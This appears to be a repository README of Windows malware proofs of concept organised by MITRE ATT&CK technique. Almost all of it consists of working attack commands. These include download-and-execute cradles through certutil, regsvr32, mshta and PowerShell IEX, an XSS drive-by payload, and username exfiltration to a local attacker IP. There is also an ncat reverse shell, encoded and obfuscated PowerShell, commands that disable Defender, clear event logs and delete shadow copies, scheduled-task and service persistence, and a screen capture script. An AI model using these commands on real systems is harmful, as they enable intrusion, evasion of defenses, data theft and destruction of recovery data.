Disclaimer: This project is for Educational Purpose Only
This repository stores the proof-of-concept of Windows malware categorized with MITRE ATT&CK.
For Linux, please visit malware-kiddie-linux
Abbreviation | Name |
---|---|
CHM (T1223) | Compiled HTML |
COM | Component Object Model |
DDE (T1173) | Dynamic Data Exchange |
HTA | HTML Application |
Drive-by Compromise (T1189)
http://demo.testfire.net/search.jsp?query=%3Cscript%3E+var+link+%3D+document.createElement%28%27a%27%29%3B+link.href+%3D+%27http%3A%2F%2F192.168.56.1%2Fvirus.exe%27%3B+link.download+%3D+%27%27%3B+document.body.appendChild%28link%29%3B+link.click%28%29%3B+%3C%2Fscript%3E
Certutil (T1105)
certutil -urlcache -split -f http://192.168.56.1/virus.exe C:\Users\IEUser\Desktop\virus.exe
Background Intelligent Transfer Service (BITSAdmin) (T1105)
bitsadmin /transfer virus /download /priority high http://192.168.56.1/virus.exe C:\Users\IEUser\Desktop\virus.exe
#Powershell
Start-BitsTransfer -Source http://192.168.56.1/virus.exe -Destination C:\Users\IEUser\Desktop\virus.exe
PowerShell
iwr http://192.168.56.1/virus.exe -OutFile virus.exe
wget http://192.168.56.1/virus.exe -O virus.exe
invoke-webrequest http://192.168.56.1/virus.exe -outfile virus.exe
Microsoft Antimalware Service Command Line Utility
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" -url http://192.168.56.1/virus.exe -path C:\Users\IEUser\Desktop\virus.exe
COM (T1117)
regsvr32.exe /u /n /s /i:http://192.168.56.102/ActiveXObject.sct scrobj.dll
COM (HTA) (T1085)
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.56.102/ActiveXObject.wsc");
COM (HTA) (T1170)
mshta javascript:document.write();GetObject("script:http://192.168.56.102/ActiveXObject.wsc");
XSL (T1220)
wmic process list /FORMAT:ActiveXObject.xsl
XSL (T1220)
wmic os get /FORMAT:"http://192.168.56.102/ActiveXObject.xsl"
MSBuild
wmic process call create "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe RunExecutable.csproj"
C# Compiler
Method 1: csc.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe" ConsoleApp.cs && ConsoleApp.exe
"C:\Program Files (x86)\MSBuild\14.0\Bin\csc.exe" ConsoleApp.cs && ConsoleApp.exe
Method 2: Powershell
powershell -command "$cp = New-Object System.CodeDom.Compiler.CompilerParameters; $cp.GenerateInMemory = $true; $cp.ReferencedAssemblies.AddRange(@("""System.dll""", [PsObject].Assembly.Location)); $code = 'public class App { public static void Main(){ System.Diagnostics.Process.Start("""calc.exe"""); } }';$provider = [System.CodeDom.Compiler.CodeDomProvider]::CreateProvider("""CSharp""").CompileAssemblyFromSource($cp, $code); $instance = $provider.CompiledAssembly.CreateInstance("""App"""); $instance.GetType().GetMethod("""Main""").Invoke($instance, $null);"
C Compiler
"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\Tools\vsdevcmd"
cl ConsoleApp.c && ConsoleApp.exe && del ConsoleApp.obj && del ConsoleApp.exe
VBScript (.vbs)
Dim command,shell
command = "pow" & "ershell calc"
Set shell = CreateObject("WScript.Shell")
shell.Run command,0
Rundll32 (T1085)
rundll32 advpack.dll, #-1152921504606846964 calc.exe
Signed Binary Proxy Execution (T1218)
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.png
msiexec /q /i http://192.168.56.102/powershell.png
Windows Update AutoUpdate Client
wuauclt.exe /UpdateDeploymentProvider virus.dll /RunHandlerComServer
Run VB script with cloned cmd.exe
C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\cmd.exe %appdata%\clone.exe /Y && echo 2 >> %appdata%\clone.exe && %appdata%\clone.exe /c start mshta "http://192.168.56.1/VBscript.php"
%COMSPEC% /b /c calc
Variable | Path |
---|---|
%COMSPEC% | C:\WINDOWS\system32\cmd.exe |
Run Powershell scripts hosted on web
powershell.exe -nop -NoProfile -WindowStyle 1 -c IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/4f645CDG')
[void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::CallByName((New-Object Net.WebClient),'D$x$ownloadStr$x$ing'.replace('$x$', ''),[Microsoft.VisualBasic.CallType]::Method,'https://paste$x$bin.com/raw/4f645CDG'.replace('$x$', '')) | IEX;
Download and open file
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -WindowStyle hidden -nologo -noprofile -ExecutionPolicy Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://secure.eicar.org/eicar.com.txt', '..\\eicar.exe');&cmd /c notepad ..\\eicar.exe",0,true);
Resource Exhausted
echo off && for /f "tokens=1" %a in ('dir/s/b *.txt') do (notepad "%a")
Task Scheduler (T1053)
schtasks /create /tn "virus" /tr C:\Users\IEUser\Desktop\virus.exe /sc minute /mo 1
schtasks /delete /tn "virus" /f
LNK (T1023)
C:\Windows\System32\cmd.exe /k echo off && echo X5O!P%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\\Users\\IEUser\\Desktop\\g4xyk.exe && exit
Service Registry Permissions Weakness (T1058)
sc.exe create malwareService binPath="%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand KABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQB4AGEAbQBwAGwAZQAuAGMAbwBtACIAKQAuAEwAaQBuAGsAcwAuAEgAcgBlAGYA
sc start malwareService
#sc delete malwareService
Remark: Although error shows "The service did not respond to the start or control request in a timely fashion.", a HTTP request is sent to target server.
Rundll
rundll32 url.dll,FileProtocolHandler http://192.168.56.102/?c=%USERNAME%
echo %USERNAME% > tmp && set /p Value=<tmp && rundll32 url.dll,FileProtocolHandler http://192.168.56.102/?c=%Value%
Explorer
explorer "http://192.168.56.102/?c=%USERNAME%"
Internet Explorer
"C:\Program Files\internet explorer\iexplore.exe" -private -extoff http://192.168.56.102/?c=%USERNAME% && sleep 3 && taskkill /IM "iexplore.exe" /F
File Deletion (T1107)
sdelete -s c:\temp
Indicator Removal on Host (T1070)
for /f %%x in ('wevtutil el') do wevtutil cl "%%x"
Obfuscated Files or Information (T1027)
Powershell:
'DEX'.replace('D','I'); #IEX
C:\Windows\Syste%ALLUSERSPROFILE:~9,1%32\cmd.exe /c copy C:\Windows\Syste%ALLUSERSPROFILE:~9,1%32\cmd.exe "%appdata%\clone.exe" /Y && echo 2 >> "%appdata%/clone.exe" && "%appdata%\clone.exe" /c start %ALLUSERSPROFILE:~9,1%sht%ALLUSERSPROFILE:~8,1% "http://192.168.56.1/VBsc%ALLUSERSPROFILE:~7,1%ipt.php"
String | Output |
---|---|
%ALLUSERSPROFILE% | C:\ProgramData |
%ALLUSERSPROFILE:~9,1% | m |
%ALLUSERSPROFILE:~8,1% | a |
%ALLUSERSPROFILE:~7,1% | r |
powershell.exe -nop -NoProfile -WindowStyle 1 -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ANABmADYANAA1AEMARABHACcAKQA=
[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/4f645CDG')"))
Command | Encoded Command |
---|---|
calc.exe |
YwBhAGwAYwAuAGUAeABlAA== |
(Invoke-WebRequest -Uri "http://www.example.com").Links.Href |
KABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQB4AGEAbQBwAGwAZQAuAGMAbwBtACIAKQAuAEwAaQBuAGsAcwAuAEgAcgBlAGYA |
Impair Defenses (T1562)
Preferences for the Windows Defender scans and updates
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Custom Command and Control Protocol (T1094)
Server:
git clone https://github.com/inquisb/icmpsh.git
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py <Server IP> <Client IP>
Client:
icmpsh.exe -t <Server IP>
Standard Cryptographic Protocol (T1032)
Step 1: Server
leafpad /etc/ssh/sshd_config
Port 443
service ssh restart
Step 2: Client
plink.exe -P 443 -l root -pw toor -C -R 8080:127.0.0.1:3389 <Server IP>
Download: plink
Step 3: Server
rdesktop 127.0.0.1:8080
Step 1: Server
ncat -nvlp 8080 --ssl
Step 2: Client
ncat -nv <Server IP> 8080 -e cmd.exe --ssl
Proxy (T1090)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d 192.168.56.1:8099 /f
File and Directory Discovery (T1083)
Powershell:
$p = "C:\Users\" + $env:UserName + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.txt"
$pathExist = [System.IO.File]::Exists($p)
if($pathExist -eq $true){ notepad $p }
- C:\Users\Public
- %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- %TEMP%
- %SYSTEM%\system32\
- C:\Users\%USERNAME%\Downloads\
- C:/$Recycle.Bin
Screen Capture (T1113)
Powershell:
$ScreenWidth = (Get-WmiObject -Class Win32_DesktopMonitor).ScreenWidth
$ScreenHeight = (Get-WmiObject -Class Win32_DesktopMonitor).ScreenHeight
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save($path)
$graphics.Dispose()
$bmp.Dispose()
}
$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, $ScreenWidth,$ScreenHeight)
screenshot $bounds "C:\Users\IEUser\Desktop\screenshot.png"
Inhibit System Recovery (T1490)
vssadmin.exe Delete Shadows /All /Quiet
Sending Keystrokes to an Application
Powershell:
$wshell = New-Object -ComObject wscript.shell
$wshell.AppActivate('Mozilla Firefox')
$wshell.SendKeys('{CAPSLOCK}')
$wshell.SendKeys('www.google.com')
$wshell.SendKeys('~')